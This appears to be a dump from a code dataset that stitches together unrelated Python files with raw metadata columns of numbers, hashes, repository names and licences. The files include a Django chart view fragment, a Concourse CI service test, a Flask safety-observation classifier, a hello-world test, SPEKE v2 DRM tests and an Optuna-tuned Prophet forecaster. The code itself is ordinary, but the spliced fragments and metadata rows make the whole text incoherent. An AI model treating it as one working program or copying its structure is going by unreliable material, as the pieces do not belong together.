def recomendacaoAderidaPorGeracao(request):
return render(request,"admin/graficos/recomendacaoaderidaporgeracao/recomendacaoaderidaporgeracao.html")
@login_required(login_url='../admin/login/')
def recomendacaoEficiencia(request):
return render(request,"admin/graficos/recomendacaoeficiencia/recomendacaoeficiencia.html")
| 37.444724
| 184
| 0.699993
| 1,833
| 14,903
| 5.580469
| 0.102564
| 0.054649
| 0.049272
| 0.057484
| 0.809757
| 0.787271
| 0.759605
| 0.753837
| 0.723433
| 0.704468
| 0
| 0.008219
| 0.14279
| 14,903
| 397
| 185
| 37.539043
| 0.792485
| 0.006173
| 0
| 0.757143
| 0
| 0
| 0.098933
| 0.031267
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.022857
| 0.02
| 0.205714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2bf598822763c56499c7ef1203a3352f3f11b44a
| 479
|
py
|
Python
|
tests/test_concourse-ci.py
|
mbools/concourseci-formula
|
45e702eaf889206aac3906607a2396a8d9a07bb1
|
[
"Apache-2.0"
] | null | null | null |
tests/test_concourse-ci.py
|
mbools/concourseci-formula
|
45e702eaf889206aac3906607a2396a8d9a07bb1
|
[
"Apache-2.0"
] | 1
|
2018-03-09T13:48:31.000Z
|
2018-03-09T13:48:31.000Z
|
tests/test_concourse-ci.py
|
mbools/concourseci-formula
|
45e702eaf889206aac3906607a2396a8d9a07bb1
|
[
"Apache-2.0"
] | 3
|
2018-10-07T11:15:04.000Z
|
2021-03-04T09:46:17.000Z
|
"""Use testinfra and py.test to verify formula works properly"""
def test_concourse_server_running_and_enabled(Service, Salt):
concourse = Service(Salt("pillar.get", "concourse-ci:server:service:name"))
assert concourse.is_running
assert concourse.is_enabled
def test_concourse_worker_running_and_enabled(Service, Salt):
concourse = Service(Salt("pillar.get", "concourse-ci:worker:service:name"))
assert concourse.is_running
assert concourse.is_enabled
| 39.916667
| 79
| 0.778706
| 64
| 479
| 5.609375
| 0.375
| 0.122563
| 0.189415
| 0.133705
| 0.707521
| 0.707521
| 0.707521
| 0.707521
| 0.707521
| 0.707521
| 0
| 0
| 0.118998
| 479
| 11
| 80
| 43.545455
| 0.850711
| 0.121086
| 0
| 0.5
| 0
| 0
| 0.20241
| 0.154217
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
921468e582bce2ff6b517fdb80d1a1967cd5e240
| 12,848
|
py
|
Python
|
app.py
|
HrishikeshGadekar/Construction-Safety-Observations-Analyzer
|
32567d13e83831c54ca8ee0fa80b72effe274c45
|
[
"Apache-2.0"
] | null | null | null |
app.py
|
HrishikeshGadekar/Construction-Safety-Observations-Analyzer
|
32567d13e83831c54ca8ee0fa80b72effe274c45
|
[
"Apache-2.0"
] | null | null | null |
app.py
|
HrishikeshGadekar/Construction-Safety-Observations-Analyzer
|
32567d13e83831c54ca8ee0fa80b72effe274c45
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from flask import Flask, request, render_template
from sklearn.feature_extraction.text import TfidfVectorizer
import pickle
app = Flask(__name__)
# read our pickle file and label LR Ngram (1, 4) as model
model = pickle.load(open('model1_4.pkl', 'rb'))
# read our pickle file and label LR Ngram (2, 4) as model2
model2 = pickle.load(open('model2_4.pkl', 'rb'))
# # read our pickle file and label LSVM Ngram (1, 4) as model
# model = pickle.load(open('lsvmmodel1_4.pkl', 'rb'))
# # read our pickle file and label LSVM Ngram (2, 4) as model2
# model2 = pickle.load(open('lsvmmodel2_4.pkl', 'rb'))
@app.route('/')
def home():
return render_template('index.html')
@app.route('/predict',methods=['POST','GET'])
def predict():
## Ngram (1, 4)
prediction = model.predict(request.form.values())
# Output Confidence scores
probability_class_GO = model.predict_proba(request.form.values())[:, 0]
probability_class_UA = model.predict_proba(request.form.values())[:, 1]
probability_class_UC = model.predict_proba(request.form.values())[:, 2]
## Ngram (2, 4)
prediction2 = model2.predict(request.form.values())
# Output Confidence scores
probability_class_GO2 = model2.predict_proba(request.form.values())[:, 0]
probability_class_UA2 = model2.predict_proba(request.form.values())[:, 1]
probability_class_UC2 = model2.predict_proba(request.form.values())[:, 2]
# P00
if probability_class_GO[0]==0.08765182261021813 or probability_class_UA[0]==0.1355507998162925 or probability_class_UC[0]==0.7767973775734893:
if probability_class_GO2[0]==0.08765182261021813 or probability_class_UA2[0]==0.1355507998162925 or probability_class_UC2[0]==0.7767973775734893:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is an Invalid Input. Please try again.',
prediction_text2='---> This is an Invalid Input. Please try again.',
)
elif prediction2==0:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is an Invalid Input. Please try again.',
prediction_text2='---> This is a Good Observation!\n The Prediction Confidence for each class are-\n GO: {},\n UA: {},\n UC: {}'.format(probability_class_GO2[0], probability_class_UA2[0],probability_class_UC2[0])
)
elif prediction2==1:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is an Invalid Input. Please try again.',
prediction_text2='---> This is an Unsafe Act !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO2[0], probability_class_UA2[0],probability_class_UC2[0])
)
elif prediction2==2:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is an Invalid Input. Please try again.',
prediction_text2='---> This is an Unsafe Condition !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO2[0], probability_class_UA2[0],probability_class_UC2[0])
)
# P0
elif prediction==0:
if probability_class_GO2[0]==0.08765182261021813 or probability_class_UA2[0]==0.1355507998162925 or probability_class_UC2[0]==0.7767973775734893:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is a Good Observation!\n The Prediction Confidence for each class are-\n GO: {},\n UA: {},\n UC: {}'.format(probability_class_GO[0], probability_class_UA[0],probability_class_UC[0]),
prediction_text2='---> This is an Invalid Input. Please try again.',
)
elif prediction2==0:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is a Good Observation!\n The Prediction Confidence for each class are-\n GO: {},\n UA: {},\n UC: {}'.format(probability_class_GO[0], probability_class_UA[0],probability_class_UC[0]),
prediction_text2='---> This is a Good Observation!\n The Prediction Confidence for each class are-\n GO: {},\n UA: {},\n UC: {}'.format(probability_class_GO2[0], probability_class_UA2[0],probability_class_UC2[0])
)
elif prediction2==1:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is a Good Observation!\n The Prediction Confidence for each class are-\n GO: {},\n UA: {},\n UC: {}'.format(probability_class_GO[0], probability_class_UA[0],probability_class_UC[0]),
prediction_text2='---> This is an Unsafe Act !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO2[0], probability_class_UA2[0],probability_class_UC2[0])
)
elif prediction2==2:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is a Good Observation!\n The Prediction Confidence for each class are-\n GO: {},\n UA: {},\n UC: {}'.format(probability_class_GO[0], probability_class_UA[0],probability_class_UC[0]),
prediction_text2='---> This is an Unsafe Condition !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO2[0], probability_class_UA2[0],probability_class_UC2[0])
)
# P1
elif prediction==1:
if probability_class_GO2[0]==0.08765182261021813 or probability_class_UA2[0]==0.1355507998162925 or probability_class_UC2[0]==0.7767973775734893:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is an Unsafe Act !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO[0], probability_class_UA[0],probability_class_UC[0]),
prediction_text2='---> This is an Invalid Input. Please try again.',
)
elif prediction2==0:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is an Unsafe Act !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO[0], probability_class_UA[0],probability_class_UC[0]),
prediction_text2='---> This is a Good Observation!\n The Prediction Confidence for each class are-\n GO: {},\n UA: {},\n UC: {}'.format(probability_class_GO2[0], probability_class_UA2[0],probability_class_UC2[0])
)
elif prediction2==1:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is an Unsafe Act !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO[0], probability_class_UA[0],probability_class_UC[0]),
prediction_text2='---> This is an Unsafe Act !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO2[0], probability_class_UA2[0],probability_class_UC2[0])
)
elif prediction2==2:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is an Unsafe Act !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO[0], probability_class_UA[0],probability_class_UC[0]),
prediction_text2='---> This is an Unsafe Condition !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO2[0], probability_class_UA2[0],probability_class_UC2[0])
)
# P2
elif prediction==2:
if probability_class_GO2[0]==0.08765182261021813 or probability_class_UA2[0]==0.1355507998162925 or probability_class_UC2[0]==0.7767973775734893:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is an Unsafe Condition !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO[0], probability_class_UA[0],probability_class_UC[0]),
prediction_text2='---> This is an Invalid Input. Please try again.',
)
elif prediction2==0:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is an Unsafe Condition !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO[0], probability_class_UA[0],probability_class_UC[0]),
prediction_text2='---> This is a Good Observation!\n The Prediction Confidence for each class are-\n GO: {},\n UA: {},\n UC: {}'.format(probability_class_GO2[0], probability_class_UA2[0],probability_class_UC2[0])
)
elif prediction2==1:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is an Unsafe Condition !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO[0], probability_class_UA[0],probability_class_UC[0]),
prediction_text2='---> This is an Unsafe Act !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO2[0], probability_class_UA2[0],probability_class_UC2[0])
)
elif prediction2==2:
return render_template('index.html',
inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
prediction_text='---> This is an Unsafe Condition !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO[0], probability_class_UA[0],probability_class_UC[0]),
prediction_text2='---> This is an Unsafe Condition !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}'.format(probability_class_GO2[0], probability_class_UA2[0],probability_class_UC2[0])
)
if __name__ == "__main__":
app.run(debug=True)
| 82.890323
| 248
| 0.574019
| 1,469
| 12,848
| 4.83322
| 0.071477
| 0.209577
| 0.119718
| 0.091268
| 0.942676
| 0.938592
| 0.915211
| 0.915211
| 0.885211
| 0.845634
| 0
| 0.05322
| 0.296544
| 12,848
| 154
| 249
| 83.428571
| 0.732352
| 0.03339
| 0
| 0.655738
| 0
| 0.196721
| 0.29577
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016393
| false
| 0
| 0.032787
| 0.008197
| 0.188525
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a611dc8a7d3c8589716aa2a8b4b2a98631552a8c
| 105
|
py
|
Python
|
lib/solutions/HLO/test_hello.py
|
DPNT-Sourcecode/CHK-xelm01
|
316e2358a71e8ef3e8bdea0e2a5b0b4b19d13fbe
|
[
"Apache-2.0"
] | null | null | null |
lib/solutions/HLO/test_hello.py
|
DPNT-Sourcecode/CHK-xelm01
|
316e2358a71e8ef3e8bdea0e2a5b0b4b19d13fbe
|
[
"Apache-2.0"
] | null | null | null |
lib/solutions/HLO/test_hello.py
|
DPNT-Sourcecode/CHK-xelm01
|
316e2358a71e8ef3e8bdea0e2a5b0b4b19d13fbe
|
[
"Apache-2.0"
] | null | null | null |
from .hello_solution import hello
def test_hello_name():
assert hello("Raz") == "Hello, Raz!"
| 17.5
| 41
| 0.657143
| 14
| 105
| 4.714286
| 0.642857
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.209524
| 105
| 5
| 42
| 21
| 0.795181
| 0
| 0
| 0
| 0
| 0
| 0.14
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a62565699bc66496893e436fcd3305ad2763cc2d
| 6,264
|
py
|
Python
|
spekev2_verification_testsuite/test_case_5_preset_video_2_audio_unencrypted.py
|
amphied/speke-reference-server
|
7b589a333fb3c619c6f7e53483d43de9a588f7b7
|
[
"Apache-2.0"
] | null | null | null |
spekev2_verification_testsuite/test_case_5_preset_video_2_audio_unencrypted.py
|
amphied/speke-reference-server
|
7b589a333fb3c619c6f7e53483d43de9a588f7b7
|
[
"Apache-2.0"
] | null | null | null |
spekev2_verification_testsuite/test_case_5_preset_video_2_audio_unencrypted.py
|
amphied/speke-reference-server
|
7b589a333fb3c619c6f7e53483d43de9a588f7b7
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from .helpers import utils, speke_element_assertions
import xml.etree.ElementTree as ET
@pytest.fixture(scope="session")
def widevine_response(spekev2_url):
return utils.send_speke_request(utils.TEST_CASE_5_P_V_2_A_UNENC, utils.PRESETS_WIDEVINE, spekev2_url)
@pytest.fixture(scope="session")
def playready_response(spekev2_url):
return utils.send_speke_request(utils.TEST_CASE_5_P_V_2_A_UNENC, utils.PRESETS_PLAYREADY, spekev2_url)
@pytest.fixture(scope="session")
def fairplay_response(spekev2_url):
return utils.send_speke_request(utils.TEST_CASE_5_P_V_2_A_UNENC, utils.PRESETS_FAIRPLAY, spekev2_url)
@pytest.fixture(scope="session")
def widevine_playready_response(spekev2_url):
return utils.send_speke_request(utils.TEST_CASE_5_P_V_2_A_UNENC, utils.PRESETS_WIDEVINE_PLAYREADY, spekev2_url)
@pytest.fixture(scope="session")
def widevine_fairplay_response(spekev2_url):
return utils.send_speke_request(utils.TEST_CASE_5_P_V_2_A_UNENC, utils.PRESETS_WIDEVINE_FAIRPLAY, spekev2_url)
@pytest.fixture(scope="session")
def playready_fairplay_response(spekev2_url):
return utils.send_speke_request(utils.TEST_CASE_5_P_V_2_A_UNENC, utils.PRESETS_PLAYREADY_FAIRPLAY, spekev2_url)
@pytest.fixture(scope="session")
def widevine_playready_fairplay_response(spekev2_url):
return utils.send_speke_request(utils.TEST_CASE_5_P_V_2_A_UNENC, utils.PRESETS_WIDEVINE_PLAYREADY_FAIRPLAY, spekev2_url)
def test_case_5_widevine(widevine_response):
root_cpix = ET.fromstring(widevine_response)
speke_element_assertions.check_cpix_version(root_cpix)
speke_element_assertions.validate_root_element(root_cpix)
speke_element_assertions.validate_mandatory_cpix_child_elements(root_cpix)
speke_element_assertions.validate_content_key_list_element(root_cpix, 2, "cenc")
speke_element_assertions.validate_drm_system_list_element(root_cpix, 2, 2, 2, 0, 0)
speke_element_assertions.validate_content_key_usage_rule_list_element(root_cpix, 2)
speke_element_assertions.validate_content_key_usage_rule_list_for_unencrypted_presets(root_cpix, "audio")
def test_case_5_playready(playready_response):
root_cpix = ET.fromstring(playready_response)
speke_element_assertions.check_cpix_version(root_cpix)
speke_element_assertions.validate_root_element(root_cpix)
speke_element_assertions.validate_mandatory_cpix_child_elements(root_cpix)
speke_element_assertions.validate_content_key_list_element(root_cpix, 2, "cenc")
speke_element_assertions.validate_drm_system_list_element(root_cpix, 2, 2, 0, 2, 0)
speke_element_assertions.validate_content_key_usage_rule_list_element(root_cpix, 2)
speke_element_assertions.validate_content_key_usage_rule_list_for_unencrypted_presets(root_cpix, "audio")
def test_case_5_fairplay(fairplay_response):
root_cpix = ET.fromstring(fairplay_response)
speke_element_assertions.check_cpix_version(root_cpix)
speke_element_assertions.validate_root_element(root_cpix)
speke_element_assertions.validate_mandatory_cpix_child_elements(root_cpix)
speke_element_assertions.validate_content_key_list_element(root_cpix, 2, "cbcs")
speke_element_assertions.validate_drm_system_list_element(root_cpix, 2, 2, 0, 0, 2)
speke_element_assertions.validate_content_key_usage_rule_list_element(root_cpix, 2)
speke_element_assertions.validate_content_key_usage_rule_list_for_unencrypted_presets(root_cpix, "audio")
def test_case_5_widevine_playready(widevine_playready_response):
root_cpix = ET.fromstring(widevine_playready_response)
speke_element_assertions.check_cpix_version(root_cpix)
speke_element_assertions.validate_root_element(root_cpix)
speke_element_assertions.validate_mandatory_cpix_child_elements(root_cpix)
speke_element_assertions.validate_content_key_list_element(root_cpix, 2, "cenc")
speke_element_assertions.validate_drm_system_list_element(root_cpix, 4, 2, 2, 2, 0)
speke_element_assertions.validate_content_key_usage_rule_list_element(root_cpix, 2)
speke_element_assertions.validate_content_key_usage_rule_list_for_unencrypted_presets(root_cpix, "audio")
def test_case_5_widevine_fairplay(widevine_fairplay_response):
root_cpix = ET.fromstring(widevine_fairplay_response)
speke_element_assertions.check_cpix_version(root_cpix)
speke_element_assertions.validate_root_element(root_cpix)
speke_element_assertions.validate_mandatory_cpix_child_elements(root_cpix)
speke_element_assertions.validate_content_key_list_element(root_cpix, 2, "cbcs")
speke_element_assertions.validate_drm_system_list_element(root_cpix, 4, 2, 2, 0, 2)
speke_element_assertions.validate_content_key_usage_rule_list_element(root_cpix, 2)
speke_element_assertions.validate_content_key_usage_rule_list_for_unencrypted_presets(root_cpix, "audio")
def test_case_5_playready_fairplay(playready_fairplay_response):
root_cpix = ET.fromstring(playready_fairplay_response)
speke_element_assertions.check_cpix_version(root_cpix)
speke_element_assertions.validate_root_element(root_cpix)
speke_element_assertions.validate_mandatory_cpix_child_elements(root_cpix)
speke_element_assertions.validate_content_key_list_element(root_cpix, 2, "cbcs")
speke_element_assertions.validate_drm_system_list_element(root_cpix, 4, 2, 0, 2, 2)
speke_element_assertions.validate_content_key_usage_rule_list_element(root_cpix, 2)
speke_element_assertions.validate_content_key_usage_rule_list_for_unencrypted_presets(root_cpix, "audio")
def test_case_5_widevine_playready_fairplay(widevine_playready_fairplay_response):
root_cpix = ET.fromstring(widevine_playready_fairplay_response)
speke_element_assertions.check_cpix_version(root_cpix)
speke_element_assertions.validate_root_element(root_cpix)
speke_element_assertions.validate_mandatory_cpix_child_elements(root_cpix)
speke_element_assertions.validate_content_key_list_element(root_cpix, 2, "cbcs")
speke_element_assertions.validate_drm_system_list_element(root_cpix, 6, 2, 2, 2, 2)
speke_element_assertions.validate_content_key_usage_rule_list_element(root_cpix, 2)
speke_element_assertions.validate_content_key_usage_rule_list_for_unencrypted_presets(root_cpix, "audio")
| 50.112
| 124
| 0.855364
| 894
| 6,264
| 5.414989
| 0.065996
| 0.092543
| 0.227226
| 0.260277
| 0.964264
| 0.960132
| 0.928321
| 0.891551
| 0.856848
| 0.856848
| 0
| 0.014563
| 0.079183
| 6,264
| 124
| 125
| 50.516129
| 0.824723
| 0
| 0
| 0.563218
| 0
| 0
| 0.017886
| 0
| 0
| 0
| 0
| 0
| 0.574713
| 1
| 0.16092
| false
| 0
| 0.034483
| 0.08046
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a699ae1a93e1ae038d689ac23ff2015712a89146
| 9,984
|
py
|
Python
|
src/Final-NeuralFBProphet/optim/bayesian.py
|
ds-wook/Final-NeuralFBProphet
|
0cb44bfa0ca1ea49077e29bce4d34af2c6a4d618
|
[
"Apache-2.0"
] | 16
|
2021-04-29T13:27:37.000Z
|
2021-12-30T00:19:00.000Z
|
src/Final-NeuralFBProphet/optim/bayesian.py
|
ds-wook/Final-NeuralFBProphet
|
0cb44bfa0ca1ea49077e29bce4d34af2c6a4d618
|
[
"Apache-2.0"
] | null | null | null |
src/Final-NeuralFBProphet/optim/bayesian.py
|
ds-wook/Final-NeuralFBProphet
|
0cb44bfa0ca1ea49077e29bce4d34af2c6a4d618
|
[
"Apache-2.0"
] | 3
|
2021-05-20T04:05:15.000Z
|
2021-05-20T04:12:40.000Z
|
from typing import Callable
import joblib
import optuna
import pandas as pd
from fbprophet import Prophet
from optuna import Trial
from optuna.samplers import TPESampler
from sklearn.metrics import mean_squared_error
class BayesianOptimizer:
def __init__(self, objective_function: object):
self.objective_function = objective_function
def build_study(self, trials: int, verbose: bool = False):
sampler = TPESampler(seed=42)
study = optuna.create_study(
study_name="TPE hyperparameter",
direction="minimize",
sampler=sampler,
)
study.optimize(self.objective_function, n_trials=trials)
if verbose:
self.display_study_statistics(study)
return study
def display_study_statistics(study: optuna.create_study):
print("Best Score:", study.best_value)
print("Best trial:", study.best_trial.params)
@staticmethod
def save_params(study: optuna.create_study, params_name: str):
params = study.best_trial.params
joblib.dump(params, "../../parameters/" + params_name)
@staticmethod
def save_two_params(study: optuna.create_study, params_name: str):
prophet_params = study.best_params
prophet_params["growth"] = "logistic"
prophet_params["seasonality_mode"] = "additive"
prophet_params["weekly_seasonality"] = True
prophet_params["daily_seasonality"] = True
prophet_params["yearly_seasonality"] = False
joblib.dump(prophet_params, "../../parameters/" + params_name)
@staticmethod
def plot_optimization_history(study: optuna.create_study) -> optuna.visualization:
return optuna.visualization.plot_optimization_history(study)
@staticmethod
def plot_param_importances(study: optuna.create_study) -> optuna.visualization:
return optuna.visualization.plot_param_importances(study)
@staticmethod
def plot_edf(study: optuna.create_study) -> optuna.visualization:
return optuna.visualization.plot_edf(study)
def ontune_prophet_objective(
train: pd.DataFrame, valid: pd.Series, cap: float, floor: float
) -> Callable[[Trial], float]:
def objective(trial: Trial) -> float:
params = {
"changepoint_range": trial.suggest_discrete_uniform(
"changepoint_range", 0.8, 0.95, 0.001
),
"n_changepoints": trial.suggest_int("n_changepoints", 20, 35),
"changepoint_prior_scale": trial.suggest_discrete_uniform(
"changepoint_prior_scale", 0.001, 0.5, 0.001
),
"seasonality_prior_scale": trial.suggest_discrete_uniform(
"seasonality_prior_scale", 1, 25, 0.5
),
"yearly_fourier": trial.suggest_int("yearly_fourier", 5, 15),
"monthly_fourier": trial.suggest_int("monthly_fourier", 3, 12),
"weekly_fourier": trial.suggest_int("weekly_fourier", 3, 7),
"quaterly_fourier": trial.suggest_int("quaterly_fourier", 3, 10),
"yearly_prior": trial.suggest_discrete_uniform("yearly_prior", 1, 25, 0.5),
"monthly_prior": trial.suggest_discrete_uniform(
"monthly_prior", 1, 25, 0.5
),
"weekly_prior": trial.suggest_discrete_uniform("weekly_prior", 1, 25, 0.5),
"quaterly_prior": trial.suggest_discrete_uniform(
"quaterly_prior", 1, 25, 0.5
),
"growth": "logistic",
"seasonality_mode": "additive",
"weekly_seasonality": True,
"daily_seasonality": True,
}
# fit_model
model = Prophet(
changepoint_range=params["changepoint_prior_scale"],
n_changepoints=params["n_changepoints"],
changepoint_prior_scale=params["changepoint_prior_scale"],
seasonality_prior_scale=params["seasonality_prior_scale"],
yearly_seasonality=False,
weekly_seasonality=True,
daily_seasonality=True,
growth="logistic",
seasonality_mode="additive",
)
model.add_seasonality(
name="yearly",
period=365.25,
fourier_order=params["yearly_fourier"],
prior_scale=params["yearly_prior"],
)
model.add_seasonality(
name="monthly",
period=30.5,
fourier_order=params["monthly_fourier"],
prior_scale=params["monthly_prior"],
)
model.add_seasonality(
name="weekly",
period=7,
fourier_order=params["weekly_fourier"],
prior_scale=params["weekly_prior"],
)
model.add_seasonality(
name="quaterly",
period=365.25 / 4,
fourier_order=params["quaterly_fourier"],
prior_scale=params["quaterly_prior"],
)
train["cap"] = cap
train["floor"] = floor
model.fit(train)
future = model.make_future_dataframe(periods=144, freq="d")
future["cap"] = cap
future["floor"] = floor
forecast = model.predict(future)
valid_forecast = forecast.tail(7)
rmse = mean_squared_error(valid.y, valid_forecast.yhat, squared=False)
return rmse
return objective
def vcenter_prophet_objective(
train: pd.DataFrame, valid: pd.Series, cap: float, floor: float
) -> Callable[[Trial], float]:
def objective(trial: Trial) -> float:
params = {
"changepoint_range": trial.suggest_discrete_uniform(
"changepoint_range", 0.8, 0.95, 0.001
),
"n_changepoints": trial.suggest_int("n_changepoints", 20, 35),
"changepoint_prior_scale": trial.suggest_discrete_uniform(
"changepoint_prior_scale", 0.001, 0.5, 0.001
),
"seasonality_prior_scale": trial.suggest_discrete_uniform(
"seasonality_prior_scale", 1, 25, 0.5
),
"yearly_fourier": trial.suggest_int("yearly_fourier", 5, 15),
"monthly_fourier": trial.suggest_int("monthly_fourier", 3, 12),
"weekly_fourier": trial.suggest_int("weekly_fourier", 3, 7),
"quaterly_fourier": trial.suggest_int("quaterly_fourier", 3, 10),
"yearly_prior": trial.suggest_discrete_uniform("yearly_prior", 1, 25, 0.5),
"monthly_prior": trial.suggest_discrete_uniform(
"monthly_prior", 1, 25, 0.5
),
"weekly_prior": trial.suggest_discrete_uniform("weekly_prior", 1, 25, 0.5),
"quaterly_prior": trial.suggest_discrete_uniform(
"quaterly_prior", 1, 25, 0.5
),
"growth": "logistic",
"seasonality_mode": "additive",
"weekly_seasonality": True,
"daily_seasonality": True,
}
# fit_model
model = Prophet(
changepoint_range=params["changepoint_prior_scale"],
n_changepoints=params["n_changepoints"],
changepoint_prior_scale=params["changepoint_prior_scale"],
seasonality_prior_scale=params["seasonality_prior_scale"],
yearly_seasonality=False,
weekly_seasonality=True,
daily_seasonality=True,
growth="logistic",
seasonality_mode="additive",
)
model.add_seasonality(
name="yearly",
period=365.25,
fourier_order=params["yearly_fourier"],
prior_scale=params["yearly_prior"],
)
model.add_seasonality(
name="monthly",
period=30.5,
fourier_order=params["monthly_fourier"],
prior_scale=params["monthly_prior"],
)
model.add_seasonality(
name="weekly",
period=7,
fourier_order=params["weekly_fourier"],
prior_scale=params["weekly_prior"],
)
model.add_seasonality(
name="quaterly",
period=365.25 / 4,
fourier_order=params["quaterly_fourier"],
prior_scale=params["quaterly_prior"],
)
train["cap"] = cap
train["floor"] = floor
model.fit(train)
future = model.make_future_dataframe(periods=144, freq="d")
future["cap"] = cap
future["floor"] = floor
forecast = model.predict(future)
valid_forecast = forecast.tail(7)
rmse = mean_squared_error(valid.y, valid_forecast.yhat, squared=False)
return rmse
return objective
def two_second_prophet_objective(
train: pd.DataFrame, valid: pd.Series, cap: float, floor: float
) -> Callable[[Trial], float]:
def objective(trial: Trial) -> float:
params = {
"changepoint_range": trial.suggest_discrete_uniform(
"changepoint_range", 0.8, 0.95, 0.001
),
"n_changepoints": trial.suggest_int("n_changepoints", 20, 35),
"changepoint_prior_scale": trial.suggest_discrete_uniform(
"changepoint_prior_scale", 0.001, 0.5, 0.001
),
"seasonality_prior_scale": trial.suggest_discrete_uniform(
"seasonality_prior_scale", 1, 25, 0.5
),
"growth": "logistic",
"seasonality_mode": "additive",
"yearly_seasonality": False,
"weekly_seasonality": True,
"daily_seasonality": True,
}
# fit_model
m = Prophet(**params)
train["cap"] = cap
train["floor"] = floor
m.fit(train)
future = m.make_future_dataframe(periods=163, freq="H")
future["cap"] = cap
future["floor"] = floor
forecast = m.predict(future)
valid_forecast = forecast.tail(163)
val_rmse = mean_squared_error(valid.y, valid_forecast.yhat, squared=False)
return val_rmse
return objective
| 36.977778
| 87
| 0.605869
| 1,044
| 9,984
| 5.522989
| 0.12931
| 0.052029
| 0.058966
| 0.079605
| 0.800035
| 0.800035
| 0.774714
| 0.76847
| 0.752862
| 0.735519
| 0
| 0.026876
| 0.284455
| 9,984
| 269
| 88
| 37.115242
